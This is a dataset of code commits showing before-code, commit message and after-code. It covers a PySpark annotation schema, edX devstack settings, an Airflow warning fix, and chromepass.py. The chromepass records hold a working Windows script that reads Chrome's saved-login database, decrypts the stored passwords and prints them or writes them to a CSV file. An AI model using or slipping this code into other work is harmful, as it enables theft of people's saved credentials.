StructField('metadata', MapType(StringType(), StringType()), False),
StructField('embeddings', ArrayType(FloatType()), False)
])
@staticmethod
def arrayType():
return ArrayType(Annotation.dataType())
|
<commit_before>from pyspark.sql.types import *
class Annotation:
def __init__(self, annotator_type, begin, end, result, metadata, embeddings):
self.annotator_type = annotator_type
self.begin = begin
self.end = end
self.result = result
self.metadata = metadata
self.embeddings = embeddings
def __str__(self):
return "Annotation(%s, %i, %i, %s, %s)" % (
self.annotator_type,
self.begin,
self.end,
self.result,
str(self.metadata)
)
def __repr__(self):
return self.__str__()
@staticmethod
def dataType():
return StructType([
StructField('annotator_type', StringType(), False),
StructField('begin', IntegerType(), False),
StructField('end', IntegerType(), False),
StructField('result', StringType(), False),
StructField('metadata', MapType(StringType(), StringType()), False),
StructField('embeddings', ArrayType(FloatType()), False)
])
@staticmethod
def arrayType():
return ArrayType(Annotation.dataType())
<commit_msg>Fix Python dataType Annotation [skip travis]
Fix in python dataType for Annotation [skip travis]<commit_after>
|
from pyspark.sql.types import *
class Annotation:
def __init__(self, annotator_type, begin, end, result, metadata, embeddings):
self.annotator_type = annotator_type
self.begin = begin
self.end = end
self.result = result
self.metadata = metadata
self.embeddings = embeddings
def __str__(self):
return "Annotation(%s, %i, %i, %s, %s)" % (
self.annotator_type,
self.begin,
self.end,
self.result,
str(self.metadata)
)
def __repr__(self):
return self.__str__()
@staticmethod
def dataType():
return StructType([
StructField('annotatorType', StringType(), False),
StructField('begin', IntegerType(), False),
StructField('end', IntegerType(), False),
StructField('result', StringType(), False),
StructField('metadata', MapType(StringType(), StringType()), False),
StructField('embeddings', ArrayType(FloatType()), False)
])
@staticmethod
def arrayType():
return ArrayType(Annotation.dataType())
|
from pyspark.sql.types import *
class Annotation:
def __init__(self, annotator_type, begin, end, result, metadata, embeddings):
self.annotator_type = annotator_type
self.begin = begin
self.end = end
self.result = result
self.metadata = metadata
self.embeddings = embeddings
def __str__(self):
return "Annotation(%s, %i, %i, %s, %s)" % (
self.annotator_type,
self.begin,
self.end,
self.result,
str(self.metadata)
)
def __repr__(self):
return self.__str__()
@staticmethod
def dataType():
return StructType([
StructField('annotator_type', StringType(), False),
StructField('begin', IntegerType(), False),
StructField('end', IntegerType(), False),
StructField('result', StringType(), False),
StructField('metadata', MapType(StringType(), StringType()), False),
StructField('embeddings', ArrayType(FloatType()), False)
])
@staticmethod
def arrayType():
return ArrayType(Annotation.dataType())
Fix Python dataType Annotation [skip travis]
Fix in python dataType for Annotation [skip travis]from pyspark.sql.types import *
class Annotation:
def __init__(self, annotator_type, begin, end, result, metadata, embeddings):
self.annotator_type = annotator_type
self.begin = begin
self.end = end
self.result = result
self.metadata = metadata
self.embeddings = embeddings
def __str__(self):
return "Annotation(%s, %i, %i, %s, %s)" % (
self.annotator_type,
self.begin,
self.end,
self.result,
str(self.metadata)
)
def __repr__(self):
return self.__str__()
@staticmethod
def dataType():
return StructType([
StructField('annotatorType', StringType(), False),
StructField('begin', IntegerType(), False),
StructField('end', IntegerType(), False),
StructField('result', StringType(), False),
StructField('metadata', MapType(StringType(), StringType()), False),
StructField('embeddings', ArrayType(FloatType()), False)
])
@staticmethod
def arrayType():
return ArrayType(Annotation.dataType())
|
<commit_before>from pyspark.sql.types import *
class Annotation:
def __init__(self, annotator_type, begin, end, result, metadata, embeddings):
self.annotator_type = annotator_type
self.begin = begin
self.end = end
self.result = result
self.metadata = metadata
self.embeddings = embeddings
def __str__(self):
return "Annotation(%s, %i, %i, %s, %s)" % (
self.annotator_type,
self.begin,
self.end,
self.result,
str(self.metadata)
)
def __repr__(self):
return self.__str__()
@staticmethod
def dataType():
return StructType([
StructField('annotator_type', StringType(), False),
StructField('begin', IntegerType(), False),
StructField('end', IntegerType(), False),
StructField('result', StringType(), False),
StructField('metadata', MapType(StringType(), StringType()), False),
StructField('embeddings', ArrayType(FloatType()), False)
])
@staticmethod
def arrayType():
return ArrayType(Annotation.dataType())
<commit_msg>Fix Python dataType Annotation [skip travis]
Fix in python dataType for Annotation [skip travis]<commit_after>from pyspark.sql.types import *
class Annotation:
def __init__(self, annotator_type, begin, end, result, metadata, embeddings):
self.annotator_type = annotator_type
self.begin = begin
self.end = end
self.result = result
self.metadata = metadata
self.embeddings = embeddings
def __str__(self):
return "Annotation(%s, %i, %i, %s, %s)" % (
self.annotator_type,
self.begin,
self.end,
self.result,
str(self.metadata)
)
def __repr__(self):
return self.__str__()
@staticmethod
def dataType():
return StructType([
StructField('annotatorType', StringType(), False),
StructField('begin', IntegerType(), False),
StructField('end', IntegerType(), False),
StructField('result', StringType(), False),
StructField('metadata', MapType(StringType(), StringType()), False),
StructField('embeddings', ArrayType(FloatType()), False)
])
@staticmethod
def arrayType():
return ArrayType(Annotation.dataType())
|
30cf33413086f558a07638aadf8b38f6e887a7fc
|
openedx/core/djangoapps/appsembler/settings/settings/devstack_lms.py
|
openedx/core/djangoapps/appsembler/settings/settings/devstack_lms.py
|
"""
Settings for Appsembler on devstack/LMS.
"""
from os import path
from openedx.core.djangoapps.appsembler.settings.settings import devstack_common
def plugin_settings(settings):
"""
Appsembler LMS overrides for devstack.
"""
devstack_common.plugin_settings(settings)
settings.DEBUG_TOOLBAR_PATCH_SETTINGS = False
settings.SITE_ID = 1
settings.EDX_API_KEY = "test"
settings.ALTERNATE_QUEUE_ENVS = ['cms']
settings.USE_S3_FOR_CUSTOMER_THEMES = False
if settings.ENABLE_COMPREHENSIVE_THEMING:
assert len(settings.COMPREHENSIVE_THEME_DIRS) == 1, (
'Tahoe supports a single theme, please double check that '
'you have only one directory in the `COMPREHENSIVE_THEME_DIRS` setting.'
)
# Add the LMS-generated customer CSS files to the list
# LMS-generated files looks like: `appsembler-academy.tahoe.appsembler.com.css`
customer_themes_dir = path.join(settings.COMPREHENSIVE_THEME_DIRS[0], 'customer_themes')
if path.isdir(customer_themes_dir):
settings.STATICFILES_DIRS.insert(0, customer_themes_dir)
|
"""
Settings for Appsembler on devstack/LMS.
"""
from os import path
from openedx.core.djangoapps.appsembler.settings.settings import devstack_common
def plugin_settings(settings):
"""
Appsembler LMS overrides for devstack.
"""
devstack_common.plugin_settings(settings)
settings.DEBUG_TOOLBAR_PATCH_SETTINGS = False
settings.SITE_ID = 1
settings.EDX_API_KEY = "test"
settings.ALTERNATE_QUEUE_ENVS = ['cms']
settings.USE_S3_FOR_CUSTOMER_THEMES = False
if settings.ENABLE_COMPREHENSIVE_THEMING:
assert len(settings.COMPREHENSIVE_THEME_DIRS) == 1, (
'Tahoe supports a single theme, please double check that '
'you have only one directory in the `COMPREHENSIVE_THEME_DIRS` setting.'
)
# Add the LMS-generated customer CSS files to the list
# LMS-generated files looks like: `appsembler-academy.tahoe.appsembler.com.css`
customer_themes_dir = path.join(settings.COMPREHENSIVE_THEME_DIRS[0], 'customer_themes')
if path.isdir(customer_themes_dir):
settings.STATICFILES_DIRS.insert(0, customer_themes_dir)
# This is used in the appsembler_sites.middleware.RedirectMiddleware to exclude certain paths
# from the redirect mechanics.
settings.MAIN_SITE_REDIRECT_WHITELIST += ['/media/']
|
Fix /media/ redirects on devstack
|
Fix /media/ redirects on devstack
|
Python
|
agpl-3.0
|
appsembler/edx-platform,appsembler/edx-platform,appsembler/edx-platform,appsembler/edx-platform
|
"""
Settings for Appsembler on devstack/LMS.
"""
from os import path
from openedx.core.djangoapps.appsembler.settings.settings import devstack_common
def plugin_settings(settings):
"""
Appsembler LMS overrides for devstack.
"""
devstack_common.plugin_settings(settings)
settings.DEBUG_TOOLBAR_PATCH_SETTINGS = False
settings.SITE_ID = 1
settings.EDX_API_KEY = "test"
settings.ALTERNATE_QUEUE_ENVS = ['cms']
settings.USE_S3_FOR_CUSTOMER_THEMES = False
if settings.ENABLE_COMPREHENSIVE_THEMING:
assert len(settings.COMPREHENSIVE_THEME_DIRS) == 1, (
'Tahoe supports a single theme, please double check that '
'you have only one directory in the `COMPREHENSIVE_THEME_DIRS` setting.'
)
# Add the LMS-generated customer CSS files to the list
# LMS-generated files looks like: `appsembler-academy.tahoe.appsembler.com.css`
customer_themes_dir = path.join(settings.COMPREHENSIVE_THEME_DIRS[0], 'customer_themes')
if path.isdir(customer_themes_dir):
settings.STATICFILES_DIRS.insert(0, customer_themes_dir)
Fix /media/ redirects on devstack
|
"""
Settings for Appsembler on devstack/LMS.
"""
from os import path
from openedx.core.djangoapps.appsembler.settings.settings import devstack_common
def plugin_settings(settings):
"""
Appsembler LMS overrides for devstack.
"""
devstack_common.plugin_settings(settings)
settings.DEBUG_TOOLBAR_PATCH_SETTINGS = False
settings.SITE_ID = 1
settings.EDX_API_KEY = "test"
settings.ALTERNATE_QUEUE_ENVS = ['cms']
settings.USE_S3_FOR_CUSTOMER_THEMES = False
if settings.ENABLE_COMPREHENSIVE_THEMING:
assert len(settings.COMPREHENSIVE_THEME_DIRS) == 1, (
'Tahoe supports a single theme, please double check that '
'you have only one directory in the `COMPREHENSIVE_THEME_DIRS` setting.'
)
# Add the LMS-generated customer CSS files to the list
# LMS-generated files looks like: `appsembler-academy.tahoe.appsembler.com.css`
customer_themes_dir = path.join(settings.COMPREHENSIVE_THEME_DIRS[0], 'customer_themes')
if path.isdir(customer_themes_dir):
settings.STATICFILES_DIRS.insert(0, customer_themes_dir)
# This is used in the appsembler_sites.middleware.RedirectMiddleware to exclude certain paths
# from the redirect mechanics.
settings.MAIN_SITE_REDIRECT_WHITELIST += ['/media/']
|
<commit_before>"""
Settings for Appsembler on devstack/LMS.
"""
from os import path
from openedx.core.djangoapps.appsembler.settings.settings import devstack_common
def plugin_settings(settings):
"""
Appsembler LMS overrides for devstack.
"""
devstack_common.plugin_settings(settings)
settings.DEBUG_TOOLBAR_PATCH_SETTINGS = False
settings.SITE_ID = 1
settings.EDX_API_KEY = "test"
settings.ALTERNATE_QUEUE_ENVS = ['cms']
settings.USE_S3_FOR_CUSTOMER_THEMES = False
if settings.ENABLE_COMPREHENSIVE_THEMING:
assert len(settings.COMPREHENSIVE_THEME_DIRS) == 1, (
'Tahoe supports a single theme, please double check that '
'you have only one directory in the `COMPREHENSIVE_THEME_DIRS` setting.'
)
# Add the LMS-generated customer CSS files to the list
# LMS-generated files looks like: `appsembler-academy.tahoe.appsembler.com.css`
customer_themes_dir = path.join(settings.COMPREHENSIVE_THEME_DIRS[0], 'customer_themes')
if path.isdir(customer_themes_dir):
settings.STATICFILES_DIRS.insert(0, customer_themes_dir)
<commit_msg>Fix /media/ redirects on devstack<commit_after>
|
"""
Settings for Appsembler on devstack/LMS.
"""
from os import path
from openedx.core.djangoapps.appsembler.settings.settings import devstack_common
def plugin_settings(settings):
"""
Appsembler LMS overrides for devstack.
"""
devstack_common.plugin_settings(settings)
settings.DEBUG_TOOLBAR_PATCH_SETTINGS = False
settings.SITE_ID = 1
settings.EDX_API_KEY = "test"
settings.ALTERNATE_QUEUE_ENVS = ['cms']
settings.USE_S3_FOR_CUSTOMER_THEMES = False
if settings.ENABLE_COMPREHENSIVE_THEMING:
assert len(settings.COMPREHENSIVE_THEME_DIRS) == 1, (
'Tahoe supports a single theme, please double check that '
'you have only one directory in the `COMPREHENSIVE_THEME_DIRS` setting.'
)
# Add the LMS-generated customer CSS files to the list
# LMS-generated files looks like: `appsembler-academy.tahoe.appsembler.com.css`
customer_themes_dir = path.join(settings.COMPREHENSIVE_THEME_DIRS[0], 'customer_themes')
if path.isdir(customer_themes_dir):
settings.STATICFILES_DIRS.insert(0, customer_themes_dir)
# This is used in the appsembler_sites.middleware.RedirectMiddleware to exclude certain paths
# from the redirect mechanics.
settings.MAIN_SITE_REDIRECT_WHITELIST += ['/media/']
|
"""
Settings for Appsembler on devstack/LMS.
"""
from os import path
from openedx.core.djangoapps.appsembler.settings.settings import devstack_common
def plugin_settings(settings):
"""
Appsembler LMS overrides for devstack.
"""
devstack_common.plugin_settings(settings)
settings.DEBUG_TOOLBAR_PATCH_SETTINGS = False
settings.SITE_ID = 1
settings.EDX_API_KEY = "test"
settings.ALTERNATE_QUEUE_ENVS = ['cms']
settings.USE_S3_FOR_CUSTOMER_THEMES = False
if settings.ENABLE_COMPREHENSIVE_THEMING:
assert len(settings.COMPREHENSIVE_THEME_DIRS) == 1, (
'Tahoe supports a single theme, please double check that '
'you have only one directory in the `COMPREHENSIVE_THEME_DIRS` setting.'
)
# Add the LMS-generated customer CSS files to the list
# LMS-generated files looks like: `appsembler-academy.tahoe.appsembler.com.css`
customer_themes_dir = path.join(settings.COMPREHENSIVE_THEME_DIRS[0], 'customer_themes')
if path.isdir(customer_themes_dir):
settings.STATICFILES_DIRS.insert(0, customer_themes_dir)
Fix /media/ redirects on devstack"""
Settings for Appsembler on devstack/LMS.
"""
from os import path
from openedx.core.djangoapps.appsembler.settings.settings import devstack_common
def plugin_settings(settings):
"""
Appsembler LMS overrides for devstack.
"""
devstack_common.plugin_settings(settings)
settings.DEBUG_TOOLBAR_PATCH_SETTINGS = False
settings.SITE_ID = 1
settings.EDX_API_KEY = "test"
settings.ALTERNATE_QUEUE_ENVS = ['cms']
settings.USE_S3_FOR_CUSTOMER_THEMES = False
if settings.ENABLE_COMPREHENSIVE_THEMING:
assert len(settings.COMPREHENSIVE_THEME_DIRS) == 1, (
'Tahoe supports a single theme, please double check that '
'you have only one directory in the `COMPREHENSIVE_THEME_DIRS` setting.'
)
# Add the LMS-generated customer CSS files to the list
# LMS-generated files looks like: `appsembler-academy.tahoe.appsembler.com.css`
customer_themes_dir = path.join(settings.COMPREHENSIVE_THEME_DIRS[0], 'customer_themes')
if path.isdir(customer_themes_dir):
settings.STATICFILES_DIRS.insert(0, customer_themes_dir)
# This is used in the appsembler_sites.middleware.RedirectMiddleware to exclude certain paths
# from the redirect mechanics.
settings.MAIN_SITE_REDIRECT_WHITELIST += ['/media/']
|
<commit_before>"""
Settings for Appsembler on devstack/LMS.
"""
from os import path
from openedx.core.djangoapps.appsembler.settings.settings import devstack_common
def plugin_settings(settings):
"""
Appsembler LMS overrides for devstack.
"""
devstack_common.plugin_settings(settings)
settings.DEBUG_TOOLBAR_PATCH_SETTINGS = False
settings.SITE_ID = 1
settings.EDX_API_KEY = "test"
settings.ALTERNATE_QUEUE_ENVS = ['cms']
settings.USE_S3_FOR_CUSTOMER_THEMES = False
if settings.ENABLE_COMPREHENSIVE_THEMING:
assert len(settings.COMPREHENSIVE_THEME_DIRS) == 1, (
'Tahoe supports a single theme, please double check that '
'you have only one directory in the `COMPREHENSIVE_THEME_DIRS` setting.'
)
# Add the LMS-generated customer CSS files to the list
# LMS-generated files looks like: `appsembler-academy.tahoe.appsembler.com.css`
customer_themes_dir = path.join(settings.COMPREHENSIVE_THEME_DIRS[0], 'customer_themes')
if path.isdir(customer_themes_dir):
settings.STATICFILES_DIRS.insert(0, customer_themes_dir)
<commit_msg>Fix /media/ redirects on devstack<commit_after>"""
Settings for Appsembler on devstack/LMS.
"""
from os import path
from openedx.core.djangoapps.appsembler.settings.settings import devstack_common
def plugin_settings(settings):
"""
Appsembler LMS overrides for devstack.
"""
devstack_common.plugin_settings(settings)
settings.DEBUG_TOOLBAR_PATCH_SETTINGS = False
settings.SITE_ID = 1
settings.EDX_API_KEY = "test"
settings.ALTERNATE_QUEUE_ENVS = ['cms']
settings.USE_S3_FOR_CUSTOMER_THEMES = False
if settings.ENABLE_COMPREHENSIVE_THEMING:
assert len(settings.COMPREHENSIVE_THEME_DIRS) == 1, (
'Tahoe supports a single theme, please double check that '
'you have only one directory in the `COMPREHENSIVE_THEME_DIRS` setting.'
)
# Add the LMS-generated customer CSS files to the list
# LMS-generated files looks like: `appsembler-academy.tahoe.appsembler.com.css`
customer_themes_dir = path.join(settings.COMPREHENSIVE_THEME_DIRS[0], 'customer_themes')
if path.isdir(customer_themes_dir):
settings.STATICFILES_DIRS.insert(0, customer_themes_dir)
# This is used in the appsembler_sites.middleware.RedirectMiddleware to exclude certain paths
# from the redirect mechanics.
settings.MAIN_SITE_REDIRECT_WHITELIST += ['/media/']
|
2ce08224bc87ae34f546211c80d2b89a38acd0ec
|
chromepass.py
|
chromepass.py
|
from os import getenv
import sqlite3
import win32crypt
csv_file = open("chromepass.csv",'wb')
csv_file.write("link,username,password\n".encode('utf-8'))
appdata = getenv("APPDATA")
if appdata[-7:] == "Roaming": #Some WINDOWS Installations point to Roaming.
appdata = appdata[:-8]
connection = sqlite3.connect(appdata + "\Local\Google\Chrome\\User Data\Default\Login Data")
cursor = connection.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for information in cursor.fetchall():
#chrome encrypts the password with Windows WinCrypt.
#Fortunately Decrypting it is no big issue.
password = win32crypt.CryptUnprotectData(information[2], None, None, None, 0)[1]
if password:
print('website_link ' + information[0])
print('Username: ' + information[1])
print('Password: ' + str(password))
csv_file.write(('%s,%s,%s\n'%(information[0],information[1],password)).encode('utf-8'))
csv_file.close()
|
from os import getenv
import sqlite3
import win32crypt
import argparse
def args_parser():
parser = argparse.ArgumentParser(description="Retrieve Google Chrome Passwords")
parser.add_argument("--output", help="Output to csv file", action="store_true")
args = parser.parse_args()
if args.output:
csv(main())
else:
for data in main():
print(data)
def main():
info_list = []
appdata = getenv("APPDATA")
if appdata[-7:] == "Roaming": # Some WINDOWS Installations point to Roaming.
appdata = appdata[:-8]
connection = sqlite3.connect(appdata + "\Local\Google\Chrome\\User Data\Default\Login Data")
cursor = connection.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for information in cursor.fetchall():
# chrome encrypts the password with Windows WinCrypt.
# Fortunately Decrypting it is no big issue.
password = win32crypt.CryptUnprotectData(information[2], None, None, None, 0)[1]
if password:
info_list.append({
'origin_url': information[0],
'username': information[1],
'password': str(password)
})
return info_list
def csv(info):
csv_file = open('chromepass.csv', 'wb')
csv_file.write('origin_url,username,password \n'.encode('utf-8'))
for data in info:
csv_file.write(('%s, %s, %s \n' % (data['origin_url'], data['username'], data['password'])).encode('utf-8'))
csv_file.close()
print("Data written to chromepass.csv")
if __name__ == '__main__':
args_parser()
|
Complete Overhaul. Argeparse used. Outputs to csv
|
Complete Overhaul. Argeparse used. Outputs to csv
|
Python
|
mit
|
hassaanaliw/chromepass
|
from os import getenv
import sqlite3
import win32crypt
csv_file = open("chromepass.csv",'wb')
csv_file.write("link,username,password\n".encode('utf-8'))
appdata = getenv("APPDATA")
if appdata[-7:] == "Roaming": #Some WINDOWS Installations point to Roaming.
appdata = appdata[:-8]
connection = sqlite3.connect(appdata + "\Local\Google\Chrome\\User Data\Default\Login Data")
cursor = connection.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for information in cursor.fetchall():
#chrome encrypts the password with Windows WinCrypt.
#Fortunately Decrypting it is no big issue.
password = win32crypt.CryptUnprotectData(information[2], None, None, None, 0)[1]
if password:
print('website_link ' + information[0])
print('Username: ' + information[1])
print('Password: ' + str(password))
csv_file.write(('%s,%s,%s\n'%(information[0],information[1],password)).encode('utf-8'))
csv_file.close()
Complete Overhaul. Argeparse used. Outputs to csv
|
from os import getenv
import sqlite3
import win32crypt
import argparse
def args_parser():
parser = argparse.ArgumentParser(description="Retrieve Google Chrome Passwords")
parser.add_argument("--output", help="Output to csv file", action="store_true")
args = parser.parse_args()
if args.output:
csv(main())
else:
for data in main():
print(data)
def main():
info_list = []
appdata = getenv("APPDATA")
if appdata[-7:] == "Roaming": # Some WINDOWS Installations point to Roaming.
appdata = appdata[:-8]
connection = sqlite3.connect(appdata + "\Local\Google\Chrome\\User Data\Default\Login Data")
cursor = connection.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for information in cursor.fetchall():
# chrome encrypts the password with Windows WinCrypt.
# Fortunately Decrypting it is no big issue.
password = win32crypt.CryptUnprotectData(information[2], None, None, None, 0)[1]
if password:
info_list.append({
'origin_url': information[0],
'username': information[1],
'password': str(password)
})
return info_list
def csv(info):
csv_file = open('chromepass.csv', 'wb')
csv_file.write('origin_url,username,password \n'.encode('utf-8'))
for data in info:
csv_file.write(('%s, %s, %s \n' % (data['origin_url'], data['username'], data['password'])).encode('utf-8'))
csv_file.close()
print("Data written to chromepass.csv")
if __name__ == '__main__':
args_parser()
|
<commit_before>from os import getenv
import sqlite3
import win32crypt
csv_file = open("chromepass.csv",'wb')
csv_file.write("link,username,password\n".encode('utf-8'))
appdata = getenv("APPDATA")
if appdata[-7:] == "Roaming": #Some WINDOWS Installations point to Roaming.
appdata = appdata[:-8]
connection = sqlite3.connect(appdata + "\Local\Google\Chrome\\User Data\Default\Login Data")
cursor = connection.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for information in cursor.fetchall():
#chrome encrypts the password with Windows WinCrypt.
#Fortunately Decrypting it is no big issue.
password = win32crypt.CryptUnprotectData(information[2], None, None, None, 0)[1]
if password:
print('website_link ' + information[0])
print('Username: ' + information[1])
print('Password: ' + str(password))
csv_file.write(('%s,%s,%s\n'%(information[0],information[1],password)).encode('utf-8'))
csv_file.close()
<commit_msg>Complete Overhaul. Argeparse used. Outputs to csv<commit_after>
|
from os import getenv
import sqlite3
import win32crypt
import argparse
def args_parser():
parser = argparse.ArgumentParser(description="Retrieve Google Chrome Passwords")
parser.add_argument("--output", help="Output to csv file", action="store_true")
args = parser.parse_args()
if args.output:
csv(main())
else:
for data in main():
print(data)
def main():
info_list = []
appdata = getenv("APPDATA")
if appdata[-7:] == "Roaming": # Some WINDOWS Installations point to Roaming.
appdata = appdata[:-8]
connection = sqlite3.connect(appdata + "\Local\Google\Chrome\\User Data\Default\Login Data")
cursor = connection.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for information in cursor.fetchall():
# chrome encrypts the password with Windows WinCrypt.
# Fortunately Decrypting it is no big issue.
password = win32crypt.CryptUnprotectData(information[2], None, None, None, 0)[1]
if password:
info_list.append({
'origin_url': information[0],
'username': information[1],
'password': str(password)
})
return info_list
def csv(info):
csv_file = open('chromepass.csv', 'wb')
csv_file.write('origin_url,username,password \n'.encode('utf-8'))
for data in info:
csv_file.write(('%s, %s, %s \n' % (data['origin_url'], data['username'], data['password'])).encode('utf-8'))
csv_file.close()
print("Data written to chromepass.csv")
if __name__ == '__main__':
args_parser()
|
from os import getenv
import sqlite3
import win32crypt
csv_file = open("chromepass.csv",'wb')
csv_file.write("link,username,password\n".encode('utf-8'))
appdata = getenv("APPDATA")
if appdata[-7:] == "Roaming": #Some WINDOWS Installations point to Roaming.
appdata = appdata[:-8]
connection = sqlite3.connect(appdata + "\Local\Google\Chrome\\User Data\Default\Login Data")
cursor = connection.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for information in cursor.fetchall():
#chrome encrypts the password with Windows WinCrypt.
#Fortunately Decrypting it is no big issue.
password = win32crypt.CryptUnprotectData(information[2], None, None, None, 0)[1]
if password:
print('website_link ' + information[0])
print('Username: ' + information[1])
print('Password: ' + str(password))
csv_file.write(('%s,%s,%s\n'%(information[0],information[1],password)).encode('utf-8'))
csv_file.close()
Complete Overhaul. Argeparse used. Outputs to csvfrom os import getenv
import sqlite3
import win32crypt
import argparse
def args_parser():
parser = argparse.ArgumentParser(description="Retrieve Google Chrome Passwords")
parser.add_argument("--output", help="Output to csv file", action="store_true")
args = parser.parse_args()
if args.output:
csv(main())
else:
for data in main():
print(data)
def main():
info_list = []
appdata = getenv("APPDATA")
if appdata[-7:] == "Roaming": # Some WINDOWS Installations point to Roaming.
appdata = appdata[:-8]
connection = sqlite3.connect(appdata + "\Local\Google\Chrome\\User Data\Default\Login Data")
cursor = connection.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for information in cursor.fetchall():
# chrome encrypts the password with Windows WinCrypt.
# Fortunately Decrypting it is no big issue.
password = win32crypt.CryptUnprotectData(information[2], None, None, None, 0)[1]
if password:
info_list.append({
'origin_url': information[0],
'username': information[1],
'password': str(password)
})
return info_list
def csv(info):
csv_file = open('chromepass.csv', 'wb')
csv_file.write('origin_url,username,password \n'.encode('utf-8'))
for data in info:
csv_file.write(('%s, %s, %s \n' % (data['origin_url'], data['username'], data['password'])).encode('utf-8'))
csv_file.close()
print("Data written to chromepass.csv")
if __name__ == '__main__':
args_parser()
|
<commit_before>from os import getenv
import sqlite3
import win32crypt
csv_file = open("chromepass.csv",'wb')
csv_file.write("link,username,password\n".encode('utf-8'))
appdata = getenv("APPDATA")
if appdata[-7:] == "Roaming": #Some WINDOWS Installations point to Roaming.
appdata = appdata[:-8]
connection = sqlite3.connect(appdata + "\Local\Google\Chrome\\User Data\Default\Login Data")
cursor = connection.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for information in cursor.fetchall():
#chrome encrypts the password with Windows WinCrypt.
#Fortunately Decrypting it is no big issue.
password = win32crypt.CryptUnprotectData(information[2], None, None, None, 0)[1]
if password:
print('website_link ' + information[0])
print('Username: ' + information[1])
print('Password: ' + str(password))
csv_file.write(('%s,%s,%s\n'%(information[0],information[1],password)).encode('utf-8'))
csv_file.close()
<commit_msg>Complete Overhaul. Argeparse used. Outputs to csv<commit_after>from os import getenv
import sqlite3
import win32crypt
import argparse
def args_parser():
parser = argparse.ArgumentParser(description="Retrieve Google Chrome Passwords")
parser.add_argument("--output", help="Output to csv file", action="store_true")
args = parser.parse_args()
if args.output:
csv(main())
else:
for data in main():
print(data)
def main():
info_list = []
appdata = getenv("APPDATA")
if appdata[-7:] == "Roaming": # Some WINDOWS Installations point to Roaming.
appdata = appdata[:-8]
connection = sqlite3.connect(appdata + "\Local\Google\Chrome\\User Data\Default\Login Data")
cursor = connection.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for information in cursor.fetchall():
# chrome encrypts the password with Windows WinCrypt.
# Fortunately Decrypting it is no big issue.
password = win32crypt.CryptUnprotectData(information[2], None, None, None, 0)[1]
if password:
info_list.append({
'origin_url': information[0],
'username': information[1],
'password': str(password)
})
return info_list
def csv(info):
csv_file = open('chromepass.csv', 'wb')
csv_file.write('origin_url,username,password \n'.encode('utf-8'))
for data in info:
csv_file.write(('%s, %s, %s \n' % (data['origin_url'], data['username'], data['password'])).encode('utf-8'))
csv_file.close()
print("Data written to chromepass.csv")
if __name__ == '__main__':
args_parser()
|
7a2e6723a925626b1d8ee6f70c656a9fd5befd5d
|
airflow/utils/__init__.py
|
airflow/utils/__init__.py
|
# -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import
import warnings
from .decorators import apply_defaults as _apply_defaults
def apply_defaults(func):
warnings.warn_explicit(
"""
You are importing apply_defaults from airflow.utils which
will be deprecated in a future version.
Please use :
from airflow.utils.decorators import apply_defaults
""",
category=PendingDeprecationWarning,
filename=func.func_code.co_filename,
lineno=func.func_code.co_firstlineno + 1
)
return _apply_defaults(func)
|
# -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import
import warnings
from .decorators import apply_defaults as _apply_defaults
def apply_defaults(func):
warnings.warn_explicit(
"""
You are importing apply_defaults from airflow.utils which
will be deprecated in a future version.
Please use :
from airflow.utils.decorators import apply_defaults
""",
category=PendingDeprecationWarning,
filename=func.__code__.co_filename,
lineno=func.__code__.co_firstlineno + 1
)
return _apply_defaults(func)
|
Fix airflow.utils deprecation warning code being Python 3 incompatible
|
Fix airflow.utils deprecation warning code being Python 3 incompatible
See https://docs.python.org/3.0/whatsnew/3.0.html#operators-and-special-methods
|
Python
|
apache-2.0
|
wooga/airflow,AllisonWang/incubator-airflow,sid88in/incubator-airflow,nathanielvarona/airflow,gritlogic/incubator-airflow,hgrif/incubator-airflow,gilt/incubator-airflow,sdiazb/airflow,andyxhadji/incubator-airflow,vijaysbhat/incubator-airflow,dmitry-r/incubator-airflow,mtagle/airflow,gritlogic/incubator-airflow,mrares/incubator-airflow,NielsZeilemaker/incubator-airflow,brandsoulmates/incubator-airflow,easytaxibr/airflow,zoyahav/incubator-airflow,NielsZeilemaker/incubator-airflow,malmiron/incubator-airflow,asnir/airflow,gilt/incubator-airflow,sdiazb/airflow,hamedhsn/incubator-airflow,hamedhsn/incubator-airflow,mtdewulf/incubator-airflow,dmitry-r/incubator-airflow,OpringaoDoTurno/airflow,biln/airflow,jesusfcr/airflow,Fokko/incubator-airflow,Acehaidrey/incubator-airflow,cjqian/incubator-airflow,yati-sagade/incubator-airflow,airbnb/airflow,dgies/incubator-airflow,owlabs/incubator-airflow,wndhydrnt/airflow,rishibarve/incubator-airflow,jesusfcr/airflow,DinoCow/airflow,ronfung/incubator-airflow,mrkm4ntr/incubator-airflow,aminghadersohi/airflow,alexvanboxel/airflow,mylons/incubator-airflow,ledsusop/airflow,saguziel/incubator-airflow,apache/airflow,kerzhner/airflow,rishibarve/incubator-airflow,janczak10/incubator-airflow,mrares/incubator-airflow,jhsenjaliya/incubator-airflow,sergiohgz/incubator-airflow,yati-sagade/incubator-airflow,r39132/airflow,r39132/airflow,N3da/incubator-airflow,jwi078/incubator-airflow,jlowin/airflow,mattuuh7/incubator-airflow,wndhydrnt/airflow,edgarRd/incubator-airflow,CloverHealth/airflow,cjqia